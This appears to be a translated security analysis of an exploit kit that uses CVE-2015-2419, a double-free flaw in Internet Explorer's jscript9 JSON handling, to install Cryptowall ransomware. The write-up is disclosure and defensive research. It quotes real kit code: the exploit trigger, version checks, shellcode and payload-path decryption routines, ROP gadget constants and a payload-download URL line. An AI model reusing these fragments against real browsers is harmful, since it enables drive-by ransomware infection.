钓鱼工具包（EK）支持CVE-2015-2419漏洞

钓鱼工具包(EK)最近增加针对IE浏览器的CVE-2015-2419漏洞的支持,该漏洞刚刚于今年七月得到修复。迅速利用刚刚修复的漏洞,一直是钓鱼工具包EK作者的惯用做法,只不过自从2014年下半年开始,他针对的目标一直是Adobe Flash Player 罢了。CVE-2015-2419漏洞是钓鱼工具包进来采用得第二个非Flash漏洞,第一个是Silverlight中的CVE-2015-1671漏洞。这可能是Adobe在Flash Player中采用的新漏洞缓解技术的结果,该技术能够阻止攻击者利用Vector(或类似)对象来控制被破坏的Flash进程。到目前为止,钓鱼工具包已经能够根据目标的具体环境,来利用其上的Flash、IE和Silverlight漏洞了。此外,钓鱼工具包还给它的IE利用代码添加了新的混淆加密技术。登陆页面每次运行时,必须从服务器取得密钥和部分数据后才能够执行漏洞攻击。 这些信息只会发送给受害者一方,即有漏洞的浏览器,并且通过自编的Diffie-Hellman提供XTEA保护。

 

利用Diffie-Hellman密钥交换协议保护IE漏洞利用代码的交付过程

 

钓鱼工具包的登陆页面已经使用HTML和Javascript进行了混淆处理。去掉第一层混淆之后,登陆页面会设法了解平台环境,选择需要使用的漏洞利用程序并启动它。对于该IE漏洞利用来说,它进行了两次混淆处理,并使用共享密钥(Diffie-Hellman(D-H)加密系统针对每个受害者的机器对利用代码进行了不同的处理。 这个加密系统是利用jsbn.js库实现的,这个库与cryptico.js颇为相似。

 

受害者的浏览器会利用POST向攻击者的服务器发送如下所示的JSON。这里使用的命名规则遵循Diffie–Hellman协议的命名规则,其中g是基数,p是模数,A是(g**a_) mod p的余数,其中a_是受害者的秘密指数,不得泄露。 但是,系统对这些值的安全性的关注还是不够,因为这些值是通过Math.random选出来的,而该函数从密码学上来讲是不安全的,此外,数值也太小,并且没有经过素性测试。 数值v源于ScriptEngineBuildNumber(),即jscript9的版本标识。

 

{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7

d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}

 

攻击者使用如下所示的base64编码的版本。B是攻击者的 D-H应答(即(g**b_) mod p,其中b_是攻击者的秘密指数,该指数不能通过网络传输)。 K是破译B所需密钥的加密版本。攻击者通过XTEA利用D-H的共享密钥(s = (A**b_) mod p)来加密一个随机密钥。 受害者利用XTEA解密k,然后解密b。

 

{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…”}

 

B用来保存这个漏洞利用代码其他部分(完整的代码见附录部分)用到的一些常量。 这些常量需要通过两次重定向才能够访问,攻击者之所以这样做,可能是为了防止别人对整个利用代码进行静态分析。因为如此以来,静态分析可以了解代码流程,却无法了解这些常量 例如ur0pqm8kx是解码shellcode的口令,stringify是从JSON调用的方法的名称。

 

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx",…}

 

 

此外,由于缺乏D-H密钥,所以无法重现这些利用代码文件。这时,D-H g、A和p都是随机生成的,所以跟攻击者原来的响应无法匹配。 因此,解出来的D-H共享密钥也是错误的,因为k和b就是错误的,所以这个漏洞利用代码根本无法运行。很明显,要想观察这个攻击过程,需要:

 

1)破解密码2)破解PRNG3)做活体实验

 

目前我们还不清楚为什么攻击者只是针对常数值进行保护,而非针对整个漏洞利用代码。初步判断,他们可能是为了避免不必要的麻烦。

 

CVE-2015-2419漏洞详情

 

CVE-2015-2419是jscript9本地JSON API中的一种双释放(double free)漏洞,该漏洞已经在今年7月被修复了。具体来说,该漏洞在JSON.stringify解析深度嵌套的JSON数据时发生的。攻击者提供给JSON.stringify的完整参数如附录所示。Il1I4['prototype'].yc =

 function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        JSON["stringify"](this.Pc, this.uc);
        a.ob(!1);
        CollectGarbage()
    };

 

 

验证浏览器版本

 

这个利用代码依赖于jscript9.dll的特定版本。在上面解码的JSON响应中,我们可以看到不同版本jscript9.dll对应于不同的密钥对。

 

"llIlII:{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"1

7689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":40

88840}

 

我们可以从下列代码中确认目标版本号:

try {
             var c = a.D["ScriptEngineMajorVersion"](),
                d = a.D["ScriptEngineMinorVersion"]()
                e = a.D["ScriptEngineBuildVersion"](),
                b = c == 11 && d == 0 && e <= 17905;
        } catch(f) {}
        if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');

 

Shellcode解密阶段

 

Shellcode位于去混淆之后的IE漏洞利用代码中,但是它是以加密形式存在的,对应的解密密钥可以从上面解码后的JSON响应中得到。 就本例而言,解密密钥是ur0pqm8kx。

 

解密例程见附录II。

 

有效载荷阶段

 

这个最新的IE漏洞被用来下载勒索软件Cryptowall,该软件类似于钓鱼工具包的变种,是近几个月才被发现的。有效载荷的下载,是以加密的形式通过网络传输的。 下载有效载荷的URL如下所示:

 

url = "https:// + window[location][host] + / + base64_decode(a)";

这里,a是从上面解码的JSON响应中得到的,就本例而言,它是xexec。

 

此外,Xexec()是一个自定义的函数,它的作用是,从工具包的登陆页上面取得密钥,然后解码取得有效载荷所需的路径。

 

    String['prototype']['xexec'] = function() {

        return decryption_routine(encrypted_path)

这里的Encrypted_path位于工具包的登陆页面上。

 

encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9

Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZ

lFVlVFM0XPV3ThBJPO1I  G 0 Z      tp M 2';

利用附录1提供的解密例程,可以解码如下所示的base64编码数据:

 

decrypted_path = ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVw

d3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPV

Z1MVBhV0lFTFlOX3JPMGI2Z0pt

解码后得到:

 

 " father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"

这就是有效载荷对应的路径。

 

从上面的路径中得到的有效载荷是经过加密处理的。所以,shellcode需要使用XTEA算法来进行解密处理。 所用的XTEA密钥位于去混淆后的HTML页面中。就本例而言,它为Du9JOBgkbfzGvmFF。

 

附录I

 

这里是获得有效载荷路径的解密例程。密钥位于工具包登陆页面中。

 

window["osSnUV"] = new Function ('text', "var cryptKey = key, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray."+p+"(rawArray."+i+"(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");

 

 

附录II

 

下面是用来获得shellcode的RC4解密例程,具体如下所示:

function DecryptionRoutine(key, encrypted_shellcode) {
            var d = [], e = 0, f, decrypted_shellcode = '';
    for (h = 0; h < 256; h++)
            {
                        d[h] = h;
            }
    for (h = 0; h < 256; h++)
            {
                        e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
            }
    for (var k = e = h = 0; k < encrypted_shellcode.length; k++)
            {
                        h = (h + 1) % 256;
                        e = (e + d[h]) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
                        decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
            }
    return decrypted_shellcode;
}

 

 

附录III

 

常量b的内容如下所示:

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx”,"IlII":"https://","lllI":/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP",
"IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"l
llll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,
"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,
"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":167
76960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"l
lllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,
"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,
"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,
"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,
"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,
"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll"
:7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,
163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,
180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl"
:90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl":
1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,
"17801":4088844,"17840":4088840,"17905":4088840

 

 

附录IV

 

攻击者为了利用CVE-2015-2419而给JSON.stringify选择的参数:

 

Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":
"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12":
"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR",
"a18":"356Q7028","a19":"8136URQ8"},"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV",
"a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78",
"a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77",
"a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS",
"a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X",
"a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2"
,"a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},"a1":"7P0RT015","a2":"IQPV6IKK",
"a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9"
:"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15"
:"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},"a1":"R88W7ICS","a2"
:"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":
"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14"
:"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
"a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8",
"a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK",
"a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783"
,"a19":"0T08F051"},"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40",
"a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8",
"a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":
"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4"
:"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10"
:"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4"
,"a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"}
uc = function (a, b) {
        return b
    }